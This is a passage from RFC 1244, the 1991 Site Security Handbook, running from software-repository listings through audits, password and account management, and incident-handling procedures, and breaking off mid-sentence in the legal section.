The file “INDEX” in this directory describes what each file
contains. They are also available from UUNET (see section
3.9.9.4.3).

Berkeley also distributes new versions of “sendmail” and
“named” from this machine. New versions of these commands
are stored in the “4.3” directory, usually in the files
“sendmail.tar.Z” and “bind.tar.Z”, respectively.

Site Security Policy Handbook Working Group [Page 54]

RFC 1244 Site Security Handbook July 1991

3.9.9.4.3 Simtel-20 and UUNET

The two largest general-purpose software repositories on the
Internet are the hosts WSMR-SIMTEL20.ARMY.MIL and
FTP.UU.NET.

WSMR-SIMTEL20.ARMY.MIL is a TOPS-20 machine operated by the
U.S. Army at White Sands Missile Range (WSMR), New Mexico.
The directory “pd2:” contains a large amount of UNIX
software, primarily taken from the “comp.sources”
newsgroups. The directories “pd1:” and
“pd2:” contains software for IBM PC systems, and
“pd3:” contains software for the Apple Macintosh.

FTP.UU.NET is operated by UUNET Communications Services,
Inc. in Falls Church, Virginia. This company sells Internet
and USENET access to sites all over the country (and
internationally). The software posted to the following
USENET source newsgroups is stored here, in directories of
the same name:

comp.sources.games
comp.sources.misc
comp.sources.sun
comp.sources.unix
comp.sources.x

Numerous other distributions, such as all the freely
distributable Berkeley UNIX source code, Internet Request
for Comments (RFCs), and so on are also stored on this
system.

3.9.9.4.4 Vendors

Many vendors make fixes for bugs in their software available
electronically, either via mailing lists or via anonymous
FTP. You should contact your vendor to find out if they
offer this service, and if so, how to access it. Some
vendors that offer these services include Sun Microsystems
(see above), Digital Equipment Corporation (DEC), the
University of California at Berkeley (see above), and Apple
Computer [5, CURRY].

Site Security Policy Handbook Working Group [Page 55]

RFC 1244 Site Security Handbook July 1991

4. Types of Security Procedures

4.1 System Security Audits

Most businesses undergo some sort of annual financial auditing as a
regular part of their business life. Security audits are an
important part of running any computing environment. Part of the
security audit should be a review of any policies that concern system
security, as well as the mechanisms that are put in place to enforce
them.

4.1.1 Organize Scheduled Drills

Although not something that would be done each day or week,
scheduled drills may be conducted to determine if the procedures
defined are adequate for the threat to be countered. If your
major threat is one of natural disaster, then a drill would be
conducted to verify your backup and recovery mechanisms. On the
other hand, if your greatest threat is from external intruders
attempting to penetrate your system, a drill might be conducted to
actually try a penetration to observe the effect of the policies.

Drills are a valuable way to test that your policies and
procedures are effective. On the other hand, drills can be time-
consuming and disruptive to normal operations. It is important to
weigh the benefits of the drills against the possible time loss
which may be associated with them.

4.1.2 Test Procedures

If the choice is made to not to use scheduled drills to examine
your entire security procedure at one time, it is important to
test individual procedures frequently. Examine your backup
procedure to make sure you can recover data from the tapes. Check
log files to be sure that information which is supposed to be
logged to them is being logged to them, etc..

When a security audit is mandated, great care should be used in
devising tests of the security policy. It is important to clearly
identify what is being tested, how the test will be conducted, and
results expected from the test. This should all be documented and
included in or as an adjunct to the security policy document
itself.

It is important to test all aspects of the security policy, both
procedural and automated, with a particular emphasis on the
automated mechanisms used to enforce the policy. Tests should be
defined to ensure a comprehensive examination of policy features,

Site Security Policy Handbook Working Group [Page 56]

RFC 1244 Site Security Handbook July 1991

that is, if a test is defined to examine the user logon process,
it should be explicitly stated that both valid and invalid user
names and passwords will be used to demonstrate proper operation
of the logon program.

Keep in mind that there is a limit to the reasonableness of tests.
The purpose of testing is to ensure confidence that the security
policy is being correctly enforced, and not to “prove” the
absoluteness of the system or policy. The goal should be to
obtain some assurance that the reasonable and credible controls
imposed by your security policy are adequate.

4.2 Account Management Procedures

Procedures to manage accounts are important in preventing
unauthorized access to your system. It is necessary to decide
several things: Who may have an account on the system? How long may
someone have an account without renewing his or her request? How do
old accounts get removed from the system? The answers to all these
questions should be explicitly set out in the policy.

In addition to deciding who may use a system, it may be important to
determine what each user may use the system for (is personal use
allowed, for example). If you are connected to an outside network,
your site or the network management may have rules about what the
network may be used for. Therefore, it is important for any security
policy to define an adequate account management procedure for both
administrators and users. Typically, the system administrator would
be responsible for creating and deleting user accounts and generally
maintaining overall control of system use. To some degree, account
management is also the responsibility of each system user in the
sense that the user should observe any system messages and events
that may be indicative of a policy violation. For example, a message
at logon that indicates the date and time of the last logon should be
reported by the user if it indicates an unreasonable time of last
logon.

4.3 Password Management Procedures

A policy on password management may be important if your site wishes
to enforce secure passwords. These procedures may range from asking
or forcing users to change their passwords occasionally to actively
attempting to break users’ passwords and then informing the user of
how easy it was to do. Another part of password management policy
covers who may distribute passwords – can users give their passwords
to other users?

Section 2.3 discusses some of the policy issues that need to be

Site Security Policy Handbook Working Group [Page 57]

RFC 1244 Site Security Handbook July 1991

decided for proper password management. Regardless of the policies,
password management procedures need to be carefully setup to avoid
disclosing passwords. The choice of initial passwords for accounts
is critical. In some cases, users may never login to activate an
account; thus, the choice of the initial password should not be
easily guessed. Default passwords should never be assigned to
accounts: always create new passwords for each user. If there are
any printed lists of passwords, these should be kept off-line in
secure locations; better yet, don’t list passwords.

4.3.1 Password Selection

Perhaps the most vulnerable part of any computer system is the
account password. Any computer system, no matter how secure it is
from network or dial-up attack, Trojan horse programs, and so on,
can be fully exploited by an intruder if he or she can gain access
via a poorly chosen password. It is important to define a good
set of rules for password selection, and distribute these rules to
all users. If possible, the software which sets user passwords
should be modified to enforce as many of the rules as possible.

A sample set of guidelines for password selection is shown below:

– DON’T use your login name in any form (as-is,
reversed, capitalized, doubled, etc.).

– DON’T use your first, middle, or last name in any form.

– DON’T use your spouse’s or child’s name.

– DON’T use other information easily obtained about you.
This includes license plate numbers, telephone numbers,
social security numbers, the make of your automobile,
the name of the street you live on, etc..

– DON’T use a password of all digits, or all the same
letter.

– DON’T use a word contained in English or foreign
language dictionaries, spelling lists, or other
lists of words.

– DON’T use a password shorter than six characters.

– DO use a password with mixed-case alphabetics.

– DO use a password with non-alphabetic characters (digits
or punctuation).

Site Security Policy Handbook Working Group [Page 58]

RFC 1244 Site Security Handbook July 1991

– DO use a password that is easy to remember, so you don’t
have to write it down.

– DO use a password that you can type quickly, without
having to look at the keyboard.

Methods of selecting a password which adheres to these guidelines
include:

– Choose a line or two from a song or poem, and use the
first letter of each word.

– Alternate between one consonant and one or two vowels, up
to seven or eight characters. This provides nonsense
words which are usually pronounceable, and thus easily
remembered.

– Choose two short words and concatenate them together with
a punctuation character between them.

Users should also be told to change their password periodically,
usually every three to six months. This makes sure that an
intruder who has guessed a password will eventually lose access,
as well as invalidating any list of passwords he/she may have
obtained. Many systems enable the system administrator to force
users to change their passwords after an expiration period; this
software should be enabled if your system supports it [5, CURRY].

Some systems provide software which forces users to change their
passwords on a regular basis. Many of these systems also include
password generators which provide the user with a set of passwords
to choose from. The user is not permitted to make up his or her
own password. There are arguments both for and against systems
such as these. On the one hand, by using generated passwords,
users are prevented from selecting insecure passwords. On the
other hand, unless the generator is good at making up easy to
remember passwords, users will begin writing them down in order to
remember them.

4.3.2 Procedures for Changing Passwords

How password changes are handled is important to keeping passwords
secure. Ideally, users should be able to change their own
passwords on-line. (Note that password changing programs are a
favorite target of intruders. See section 4.4 on configuration
management for further information.)

However, there are exception cases which must be handled

Site Security Policy Handbook Working Group [Page 59]

RFC 1244 Site Security Handbook July 1991

carefully. Users may forget passwords and not be able to get onto
the system. The standard procedure is to assign the user a new
password. Care should be taken to make sure that the real person
is requesting the change and gets the new password. One common
trick used by intruders is to call or message to a system
administrator and request a new password. Some external form of
verification should be used before the password is assigned. At
some sites, users are required to show up in person with ID.

There may also be times when many passwords need to be changed.
If a system is compromised by an intruder, the intruder may be
able to steal a password file and take it off the system. Under
these circumstances, one course of action is to change all
passwords on the system. Your site should have procedures for how
this can be done quickly and efficiently. What course you choose
may depend on the urgency of the problem. In the case of a known
attack with damage, you may choose to forcibly disable all
accounts and assign users new passwords before they come back onto
the system. In some places, users are sent a message telling them
that they should change their passwords, perhaps within a certain
time period. If the password isn’t changed before the time period
expires, the account is locked.

Users should be aware of what the standard procedure is for
passwords when a security event has occurred. One well-known
spoof reported by the Computer Emergency Response Team (CERT)
involved messages sent to users, supposedly from local system
administrators, requesting them to immediately change their
password to a new value provided in the message [24]. These
messages were not from the administrators, but from intruders
trying to steal accounts. Users should be warned to immediately
report any suspicious requests such as this to site
administrators.

4.4 Configuration Management Procedures

Configuration management is generally applied to the software
development process. However, it is certainly applicable in a
operational sense as well. Consider that the since many of the
system level programs are intended to enforce the security policy, it
is important that these be “known” as correct. That is, one should
not allow system level programs (such as the operating system, etc.)
to be changed arbitrarily. At very least, the procedures should
state who is authorized to make changes to systems, under what
circumstances, and how the changes should be documented.

In some environments, configuration management is also desirable as
applied to physical configuration of equipment. Maintaining valid

Site Security Policy Handbook Working Group [Page 60]

RFC 1244 Site Security Handbook July 1991

and authorized hardware configuration should be given due
consideration in your security policy.

4.4.1 Non-Standard Configurations

Occasionally, it may be beneficial to have a slightly non-standard
configuration in order to thwart the “standard” attacks used by
some intruders. The non-standard parts of the configuration might
include different password encryption algorithms, different
configuration file locations, and rewritten or functionally
limited system commands.

Non-standard configurations, however, also have their drawbacks.
By changing the “standard” system, these modifications make
software maintenance more difficult by requiring extra
documentation to be written, software modification after operating
system upgrades, and, usually, someone with special knowledge of
the changes.

Because of the drawbacks of non-standard configurations, they are
often only used in environments with a “firewall” machine (see
section 3.9.1). The firewall machine is modified in non-standard
ways since it is susceptible to attack, while internal systems
behind the firewall are left in their standard configurations.

5. Incident Handling

5.1 Overview

This section of the document will supply some guidance to be applied
when a computer security event is in progress on a machine, network,
site, or multi-site environment. The operative philosophy in the
event of a breach of computer security, whether it be an external
intruder attack or a disgruntled employee, is to plan for adverse
events in advance. There is no substitute for creating contingency
plans for the types of events described above.

Traditional computer security, while quite important in the overall
site security plan, usually falls heavily on protecting systems from
attack, and perhaps monitoring systems to detect attacks. Little
attention is usually paid for how to actually handle the attack when
it occurs. The result is that when an attack is in progress, many
decisions are made in haste and can be damaging to tracking down the
source of the incident, collecting evidence to be used in prosecution
efforts, preparing for the recovery of the system, and protecting the
valuable data contained on the system.

Site Security Policy Handbook Working Group [Page 61]

RFC 1244 Site Security Handbook July 1991

5.1.1 Have a Plan to Follow in Case of an Incident

Part of handling an incident is being prepared to respond before
the incident occurs. This includes establishing a suitable level
of protections, so that if the incident becomes severe, the damage
which can occur is limited. Protection includes preparing
incident handling guidelines or a contingency response plan for
your organization or site. Having written plans eliminates much
of the ambiguity which occurs during an incident, and will lead to
a more appropriate and thorough set of responses. Second, part of
protection is preparing a method of notification, so you will know
who to call and the relevant phone numbers. It is important, for
example, to conduct “dry runs,” in which your computer security
personnel, system administrators, and managers simulate handling
an incident.

Learning to respond efficiently to an incident is important for
numerous reasons. The most important benefit is directly to human
beings–preventing loss of human life. Some computing systems are
life critical systems, systems on which human life depends (e.g.,
by controlling some aspect of life-support in a hospital or
assisting air traffic controllers).

An important but often overlooked benefit is an economic one.
Having both technical and managerial personnel respond to an
incident requires considerable resources, resources which could be
utilized more profitably if an incident did not require their
services. If these personnel are trained to handle an incident
efficiently, less of their time is required to deal with that
incident.

A third benefit is protecting classified, sensitive, or
proprietary information. One of the major dangers of a computer
security incident is that information may be irrecoverable.
Efficient incident handling minimizes this danger. When
classified information is involved, other government regulations
may apply and must be integrated into any plan for incident
handling.

A fourth benefit is related to public relations. News about
computer security incidents tends to be damaging to an
organization’s stature among current or potential clients.
Efficient incident handling minimizes the potential for negative
exposure.

A final benefit of efficient incident handling is related to legal
issues. It is possible that in the near future organizations may
be sued because one of their nodes was used to launch a network

Site Security Policy Handbook Working Group [Page 62]

RFC 1244 Site Security Handbook July 1991

attack. In a similar vein, people who develop patches or
workarounds may be sued if the patches or workarounds are
ineffective, resulting in damage to systems, or if the patches or
workarounds themselves damage systems. Knowing about operating
system vulnerabilities and patterns of attacks and then taking
appropriate measures is critical to circumventing possible legal
problems.

5.1.2 Order of Discussion in this Session Suggests an Order for
a Plan

This chapter is arranged such that a list may be generated from
the Table of Contents to provide a starting point for creating a
policy for handling ongoing incidents. The main points to be
included in a policy for handling incidents are:

o Overview (what are the goals and objectives in handling the
incident).
o Evaluation (how serious is the incident).
o Notification (who should be notified about the incident).
o Response (what should the response to the incident be).
o Legal/Investigative (what are the legal and prosecutorial
implications of the incident).
o Documentation Logs (what records should be kept from before,
during, and after the incident).

Each of these points is important in an overall plan for handling
incidents. The remainder of this chapter will detail the issues
involved in each of these topics, and provide some guidance as to
what should be included in a site policy for handling incidents.

5.1.3 Possible Goals and Incentives for Efficient Incident
Handling

As in any set of pre-planned procedures, attention must be placed
on a set of goals to be obtained in handling an incident. These
goals will be placed in order of importance depending on the site,
but one such set of goals might be:

Assure integrity of (life) critical systems.
Maintain and restore data.
Maintain and restore service.
Figure out how it happened.
Avoid escalation and further incidents.
Avoid negative publicity.
Find out who did it.
Punish the attackers.

Site Security Policy Handbook Working Group [Page 63]

RFC 1244 Site Security Handbook July 1991

It is important to prioritize actions to be taken during an
incident well in advance of the time an incident occurs.
Sometimes an incident may be so complex that it is impossible to
do everything at once to respond to it; priorities are essential.
Although priorities will vary from institution-to-institution, the
following suggested priorities serve as a starting point for
defining an organization’s response:

o Priority one — protect human life and people’s
safety; human life always has precedence over all
other considerations.

o Priority two — protect classified and/or sensitive
data (as regulated by your site or by government
regulations).

o Priority three — protect other data, including
proprietary, scientific, managerial and other data,
because loss of data is costly in terms of resources.

o Priority four — prevent damage to systems (e.g., loss
or alteration of system files, damage to disk drives,
etc.); damage to systems can result in costly down
time and recovery.

o Priority five — minimize disruption of computing
resources; it is better in many cases to shut a system
down or disconnect from a network than to risk damage
to data or systems.

An important implication for defining priorities is that once
human life and national security considerations have been
addressed, it is generally more important to save data than system
software and hardware. Although it is undesirable to have any
damage or loss during an incident, systems can be replaced; the
loss or compromise of data (especially classified data), however,
is usually not an acceptable outcome under any circumstances.

Part of handling an incident is being prepared to respond before
the incident occurs. This includes establishing a suitable level
of protections so that if the incident becomes severe, the damage
which can occur is limited. Protection includes preparing
incident handling guidelines or a contingency response plan for
your organization or site. Written plans eliminate much of the
ambiguity which occurs during an incident, and will lead to a more
appropriate and thorough set of responses. Second, part of
protection is preparing a method of notification so you will know
who to call and how to contact them. For example, every member of

Site Security Policy Handbook Working Group [Page 64]

RFC 1244 Site Security Handbook July 1991

the Department of Energy’s CIAC Team carries a card with every
other team member’s work and home phone numbers, as well as pager
numbers. Third, your organization or site should establish backup
procedures for every machine and system. Having backups
eliminates much of the threat of even a severe incident, since
backups preclude serious data loss. Fourth, you should set up
secure systems. This involves eliminating vulnerabilities,
establishing an effective password policy, and other procedures,
all of which will be explained later in this document. Finally,
conducting training activities is part of protection. It is
important, for example, to conduct “dry runs,” in which your
computer security personnel, system administrators, and managers
simulate handling an incident.

5.1.4 Local Policies and Regulations Providing Guidance

Any plan for responding to security incidents should be guided by
local policies and regulations. Government and private sites that
deal with classified material have specific rules that they must
follow.

The policies your site makes about how it responds to incidents
(as discussed in sections 2.4 and 2.5) will shape your response.
For example, it may make little sense to create mechanisms to
monitor and trace intruders if your site does not plan to take
action against the intruders if they are caught. Other
organizations may have policies that affect your plans. Telephone
companies often release information about telephone traces only to
law enforcement agencies.

Section 5.5 also notes that if any legal action is planned, there
are specific guidelines that must be followed to make sure that
any information collected can be used as evidence.

5.2 Evaluation

5.2.1 Is It Real?

This stage involves determining the exact problem. Of course
many, if not most, signs often associated with virus infections,
system intrusions, etc., are simply anomalies such as hardware
failures. To assist in identifying whether there really is an
incident, it is usually helpful to obtain and use any detection
software which may be available. For example, widely available
software packages can greatly assist someone who thinks there may
be a virus in a Macintosh computer. Audit information is also
extremely useful, especially in determining whether there is a
network attack. It is extremely important to obtain a system

Site Security Policy Handbook Working Group [Page 65]

RFC 1244 Site Security Handbook July 1991

snapshot as soon as one suspects that something is wrong. Many
incidents cause a dynamic chain of events to occur, and an initial
system snapshot may do more good in identifying the problem and
any source of attack than most other actions which can be taken at
this stage. Finally, it is important to start a log book.
Recording system events, telephone conversations, time stamps,
etc., can lead to a more rapid and systematic identification of
the problem, and is the basis for subsequent stages of incident
handling.

There are certain indications or “symptoms” of an incident which
deserve special attention:

o System crashes.
o New user accounts (e.g., the account RUMPLESTILTSKIN
has unexplainedly been created), or high activity on
an account that has had virtually no activity for
months.
o New files (usually with novel or strange file names,
such as data.xx or k).
o Accounting discrepancies (e.g., in a UNIX system you
might notice that the accounting file called
/usr/admin/lastlog has shrunk, something that should
make you very suspicious that there may be an
intruder).
o Changes in file lengths or dates (e.g., a user should
be suspicious if he/she observes that the .EXE files in
an MS DOS computer have unexplainedly grown
by over 1800 bytes).
o Attempts to write to system (e.g., a system manager
notices that a privileged user in a VMS system is
attempting to alter RIGHTSLIST.DAT).
o Data modification or deletion (e.g., files start to
disappear).
o Denial of service (e.g., a system manager and all
other users become locked out of a UNIX system, which
has been changed to single user mode).
o Unexplained, poor system performance (e.g., system
response time becomes unusually slow).
o Anomalies (e.g., “GOTCHA” is displayed on a display
terminal or there are frequent unexplained “beeps”).
o Suspicious probes (e.g., there are numerous
unsuccessful login attempts from another node).
o Suspicious browsing (e.g., someone becomes a root user
on a UNIX system and accesses file after file in one
user’s account, then another’s).

None of these indications is absolute “proof” that an incident is

Site Security Policy Handbook Working Group [Page 66]

RFC 1244 Site Security Handbook July 1991

occurring, nor are all of these indications normally observed when
an incident occurs. If you observe any of these indications,
however, it is important to suspect that an incident might be
occurring, and act accordingly. There is no formula for
determining with 100 percent accuracy that an incident is
occurring (possible exception: when a virus detection package
indicates that your machine has the nVIR virus and you confirm
this by examining contents of the nVIR resource in your Macintosh
computer, you can be very certain that your machine is infected).
It is best at this point to collaborate with other technical and
computer security personnel to make a decision as a group about
whether an incident is occurring.

5.2.2 Scope

Along with the identification of the incident is the evaluation of
the scope and impact of the problem. It is important to correctly
identify the boundaries of the incident in order to effectively
deal with it. In addition, the impact of an incident will
determine its priority in allocating resources to deal with the
event. Without an indication of the scope and impact of the
event, it is difficult to determine a correct response.

In order to identify the scope and impact, a set of criteria
should be defined which is appropriate to the site and to the type
of connections available. Some of the issues are:

o Is this a multi-site incident?
o Are many computers at your site effected by this
incident?
o Is sensitive information involved?
o What is the entry point of the incident (network,
phone line, local terminal, etc.)?
o Is the press involved?
o What is the potential damage of the incident?
o What is the estimated time to close out the incident?
o What resources could be required
to handle the incident?

5.3 Possible Types of Notification

When you have confirmed that an incident is occurring, the
appropriate personnel must be notified. Who and how this
notification is achieved is very important in keeping the event under
control both from a technical and emotional standpoint.

Site Security Policy Handbook Working Group [Page 67]

RFC 1244 Site Security Handbook July 1991

5.3.1 Explicit

First of all, any notification to either local or off-site
personnel must be explicit. This requires that any statement (be
it an electronic mail message, phone call, or fax) provides
information about the incident that is clear, concise, and fully
qualified. When you are notifying others that will help you to
handle an event, a “smoke screen” will only divide the effort and
create confusion. If a division of labor is suggested, it is
helpful to provide information to each section about what is being
accomplished in other efforts. This will not only reduce
duplication of effort, but allow people working on parts of the
problem to know where to obtain other information that would help
them resolve a part of the incident.

5.3.2 Factual

Another important consideration when communicating about the
incident is to be factual. Attempting to hide aspects of the
incident by providing false or incomplete information may not only
prevent a successful resolution to the incident, but may even
worsen the situation. This is especially true when the press is
involved. When an incident severe enough to gain press attention
is ongoing, it is likely that any false information you provide
will not be substantiated by other sources. This will reflect
badly on the site and may create enough ill-will between the site
and the press to damage the site’s public relations.

5.3.3 Choice of Language

The choice of language used when notifying people about the
incident can have a profound effect on the way that information is
received. When you use emotional or inflammatory terms, you raise
the expectations of damage and negative outcomes of the incident.
It is important to remain calm both in written and spoken
notifications.

Another issue associated with the choice of language is the
notification to non-technical or off-site personnel. It is
important to accurately describe the incident without undue alarm
or confusing messages. While it is more difficult to describe the
incident to a non-technical audience, it is often more important.
A non-technical description may be required for upper-level
management, the press, or law enforcement liaisons. The
importance of these notifications cannot be underestimated and may
make the difference between handling the incident properly and
escalating to some higher level of damage.

Site Security Policy Handbook Working Group [Page 68]

RFC 1244 Site Security Handbook July 1991

5.3.4 Notification of Individuals

o Point of Contact (POC) people (Technical, Administrative,
Response Teams, Investigative, Legal, Vendors, Service
providers), and which POCs are visible to whom.
o Wider community (users).
o Other sites that might be affected.

Finally, there is the question of who should be notified during
and after the incident. There are several classes of individuals
that need to be considered for notification. These are the
technical personnel, administration, appropriate response teams
(such as CERT or CIAC), law enforcement, vendors, and other
service providers. These issues are important for the central
point of contact, since that is the person responsible for the
actual notification of others (see section 5.3.6 for further
information). A list of people in each of these categories is an
important time saver for the POC during an incident. It is much
more difficult to find an appropriate person during an incident
when many urgent events are ongoing.

In addition to the people responsible for handling part of the
incident, there may be other sites affected by the incident (or
perhaps simply at risk from the incident). A wider community of
users may also benefit from knowledge of the incident. Often, a
report of the incident once it is closed out is appropriate for
publication to the wider user community.

5.3.5 Public Relations – Press Releases

One of the most important issues to consider is when, who, and how
much to release to the general public through the press. There
are many issues to consider when deciding this particular issue.
First and foremost, if a public relations office exists for the
site, it is important to use this office as liaison to the press.
The public relations office is trained in the type and wording of
information released, and will help to assure that the image of
the site is protected during and after the incident (if possible).
A public relations office has the advantage that you can
communicate candidly with them, and provide a buffer between the
constant press attention and the need of the POC to maintain
control over the incident.

If a public relations office is not available, the information
released to the press must be carefully considered. If the
information is sensitive, it may be advantageous to provide only
minimal or overview information to the press. It is quite
possible that any information provided to the press will be

Site Security Policy Handbook Working Group [Page 69]

RFC 1244 Site Security Handbook July 1991

quickly reviewed by the perpetrator of the incident. As a
contrast to this consideration, it was discussed above that
misleading the press can often backfire and cause more damage than
releasing sensitive information.

While it is difficult to determine in advance what level of detail
to provide to the press, some guidelines to keep in mind are:

o Keep the technical level of detail low. Detailed
information about the incident may provide enough
information for copy-cat events or even damage the
site’s ability to prosecute once the event is over.
o Keep the speculation out of press statements.
Speculation of who is causing the incident or the
motives are very likely to be in error and may cause
an inflamed view of the incident.
o Work with law enforcement professionals to assure that
evidence is protected. If prosecution is involved,
assure that the evidence collected is not divulged to
the press.
o Try not to be forced into a press interview before you are
prepared. The popular press is famous for the “2am”
interview, where the hope is to catch the interviewee off
guard and obtain information otherwise not available.
o Do not allow the press attention to detract from the
handling of the event. Always remember that the successful
closure of an incident is of primary importance.

5.3.6 Who Needs to Get Involved?

There now exists a number of incident response teams (IRTs) such
as the CERT and the CIAC. (See sections 3.9.7.3.1 and 3.9.7.3.4.)
Teams exists for many major government agencies and large
corporations. If such a team is available for your site, the
notification of this team should be of primary importance during
the early stages of an incident. These teams are responsible for
coordinating computer security incidents over a range of sites and
larger entities. Even if the incident is believed to be contained
to a single site, it is possible that the information available
through a response team could help in closing out the incident.

In setting up a site policy for incident handling, it may be
desirable to create an incident handling team (IHT), much like
those teams that already exist, that will be responsible for
handling computer security incidents for the site (or
organization). If such a team is created, it is essential that
communication lines be opened between this team and other IHTs.
Once an incident is under way, it is difficult to open a trusted

Site Security Policy Handbook Working Group [Page 70]

RFC 1244 Site Security Handbook July 1991

dialogue between other IHTs if none has existed before.

5.4 Response

A major topic still untouched here is how to actually respond to an
event. The response to an event will fall into the general
categories of containment, eradication, recovery, and follow-up.

Containment

The purpose of containment is to limit the extent of an attack.
For example, it is important to limit the spread of a worm attack
on a network as quickly as possible. An essential part of
containment is decision making (i.e., determining whether to shut
a system down, to disconnect from a network, to monitor system or
network activity, to set traps, to disable functions such as
remote file transfer on a UNIX system, etc.). Sometimes this
decision is trivial; shut the system down if the system is
classified or sensitive, or if proprietary information is at risk!
In other cases, it is worthwhile to risk having some damage to the
system if keeping the system up might enable you to identify an
intruder.

The third stage, containment, should involve carrying out
predetermined procedures. Your organization or site should, for
example, define acceptable risks in dealing with an incident, and
should prescribe specific actions and strategies accordingly.
Finally, notification of cognizant authorities should occur during
this stage.

Eradication

Once an incident has been detected, it is important to first think
about containing the incident. Once the incident has been
contained, it is now time to eradicate the cause. Software may be
available to help you in this effort. For example, eradication
software is available to eliminate most viruses which infect small
systems. If any bogus files have been created, it is time to
delete them at this point. In the case of virus infections, it is
important to clean and reformat any disks containing infected
files. Finally, ensure that all backups are clean. Many systems
infected with viruses become periodically reinfected simply
because people do not systematically eradicate the virus from
backups.

Recovery

Once the cause of an incident has been eradicated, the recovery

Site Security Policy Handbook Working Group [Page 71]

RFC 1244 Site Security Handbook July 1991

phase defines the next stage of action. The goal of recovery is
to return the system to normal. In the case of a network-based
attack, it is important to install patches for any operating
system vulnerability which was exploited.

Follow-up

One of the most important stages of responding to incidents is
also the most often omitted—the follow-up stage. This stage is
important because it helps those involved in handling the incident
develop a set of “lessons learned” (see section 6.3) to improve
future performance in such situations. This stage also provides
information which justifies an organization’s computer security
effort to management, and yields information which may be
essential in legal proceedings.

The most important element of the follow-up stage is performing a
postmortem analysis. Exactly what happened, and at what times?
How well did the staff involved with the incident perform? What
kind of information did the staff need quickly, and how could they
have gotten that information as soon as possible? What would the
staff do differently next time? A follow-up report is valuable
because it provides a reference to be used in case of other
similar incidents. Creating a formal chronology of events
(including time stamps) is also important for legal reasons.
Similarly, it is also important to as quickly obtain a monetary
estimate of the amount of damage the incident caused in terms of
any loss of software and files, hardware damage, and manpower
costs to restore altered files, reconfigure affected systems, and
so forth. This estimate may become the basis for subsequent
prosecution activity by the FBI, the U.S. Attorney General’s
Office, etc..

5.4.1 What Will You Do?

o Restore control.
o Relation to policy.
o Which level of service is needed?
o Monitor activity.
o Constrain or shut down system.

5.4.2 Consider Designating a “Single Point of Contact”

When an incident is under way, a major issue is deciding who is in
charge of coordinating the activity of the multitude of players.
A major mistake that can be made is to have a number of “points of
contact” (POC) that are not pulling their efforts together. This
will only add to the confusion of the event, and will probably

Site Security Policy Handbook Working Group [Page 72]

RFC 1244 Site Security Handbook July 1991

lead to additional confusion and wasted or ineffective effort.

The single point of contact may or may not be the person “in
charge” of the incident. There are two distinct rolls to fill
when deciding who shall be the point of contact and the person in
charge of the incident. The person in charge will make decisions
as to the interpretation of policy applied to the event. The
responsibility for the handling of the event falls onto this
person. In contrast, the point of contact must coordinate the
effort of all the parties involved with handling the event.

The point of contact must be a person with the technical expertise
to successfully coordinate the effort of the system managers and
users involved in monitoring and reacting to the attack. Often
the management structure of a site is such that the administrator
of a set of resources is not a technically competent person with
regard to handling the details of the operations of the computers,
but is ultimately responsible for the use of these resources.

Another important function of the POC is to maintain contact with
law enforcement and other external agencies (such as the CIA, DoD,
U.S. Army, or others) to assure that multi-agency involvement
occurs.

Finally, if legal action in the form of prosecution is involved,
the POC may be able to speak for the site in court. The
alternative is to have multiple witnesses that will be hard to
coordinate in a legal sense, and will weaken any case against the
attackers. A single POC may also be the single person in charge
of evidence collected, which will keep the number of people
accounting for evidence to a minimum. As a rule of thumb, the
more people that touch a potential piece of evidence, the greater
the possibility that it will be inadmissible in court. The
section below (Legal/Investigative) will provide more details for
consideration on this topic.

5.5 Legal/Investigative

5.5.1 Establishing Contacts with Investigative Agencies

It is important to establish contacts with personnel from
investigative agencies such as the FBI and Secret Service as soon
as possible, for several reasons. Local law enforcement and local
security offices or campus police organizations should also be
informed when appropriate. A primary reason is that once a major
attack is in progress, there is little time to call various
personnel in these agencies to determine exactly who the correct
point of contact is. Another reason is that it is important to

Site Security Policy Handbook Working Group [Page 73]

RFC 1244 Site Security Handbook July 1991

cooperate with these agencies in a manner that will foster a good
working relationship, and that will be in accordance with the
working procedures of these agencies. Knowing the working
procedures in advance and the expectations of your point of
contact is a big step in this direction. For example, it is
important to gather evidence that will be admissible in a court of
law. If you don’t know in advance how to gather admissible
evidence, your efforts to collect evidence during an incident are
likely to be of no value to the investigative agency with which
you deal. A final reason for establishing contacts as soon as
possible is that it is impossible to know the particular agency
that will assume jurisdiction in any given incident. Making
contacts and finding the proper channels early will make
responding to an incident go considerably more smoothly.

If your organization or site has a legal counsel, you need to
notify this office soon after you learn that an incident is in
progress. At a minimum, your legal counsel needs to be involved
to protect the legal and financial interests of your site or
organization. There are many legal and practical issues, a few of
which are:

1. Whether your site or organization is willing to risk
negative publicity or exposure to cooperate with legal
prosecution efforts.

2. Downstream liability–if you leave a compromised system
as is so it can be monitored and another computer is damaged
because the attack originated from your system, your site or
organization may be liable for damages incurred.

3. Distribution of information–if your site or organization
distributes information about an attack in which another
site or organization may be involved or the vulnerability
in a product that may affect ability to market that
product, your site or organization may again be liable
for any damages (including damage of reputation).

4. Liabilities due to monitoring–your site or organization
may be sued if users at your site or elsewhere discover
that your site is monitoring account activity without
informing users.

Unfortunately, there are no clear precedents yet on the
liabilities or responsibilities of organizations involved in a
security incident or who might be involved in supporting an
investigative effort. Investigators will often encourage
organizations to help trace and monitor intruders — indeed, most

Site Security Policy Handbook Working Group [Page 74]

RFC 1244 Site Security Handbook July 1991

investigators cannot pursue computer intrusions without extensive
support from the organizations involved. However, investigators
cannot provide protection from liability claims, and these kinds
of efforts may drag out for months and may take lots of effort.

On the other side, an organization’s legal council may advise
extreme caution and suggest that tracing activities be halted and
an intruder shut out of the system. This in itself may not
provide protection from liability, and may prevent investigators
from identifying anyone.

The balance between supporting investigative activity and limiting
liability is tricky; you’ll need to consider the advice of your
council and the damage the intruder is causing (if any) in making
your decision about what to do during any particular incident.

Your legal counsel should also be involved in any decision to
contact investigative agencies when an incident occurs at your
site. The decision to coordinate efforts with investigative
agencies is most properly that of your site or organization.
Involving your legal counsel will also foster the multi-level
coordination between your site and the particular investigative
agency involved which in turn results in an efficient division of
labor. Another result is that you are likely to obtain guidance
that will help you avoid future legal mistakes.

Finally, your legal counsel should evaluate your site’s written
procedures for responding to incidents. It is essential to obtain
a “clean bill of health” from a legal perspective before you
actually carry out these procedures.

5.5.2 Formal and Informal Legal Procedures

One of the most important considerations in dealing with
investigative agencies is verifying that the person who calls
asking for information is a legitimate representative from the
agency in question. Unfortunately, many well intentioned people
have unknowingly leaked sensitive information about incidents,
allowed unauthorized people into their systems, etc., because a
caller has masqueraded as an FBI or Secret Service agent. A
similar consideration is using a secure means of communication.
Because many network attackers can easily reroute electronic mail,
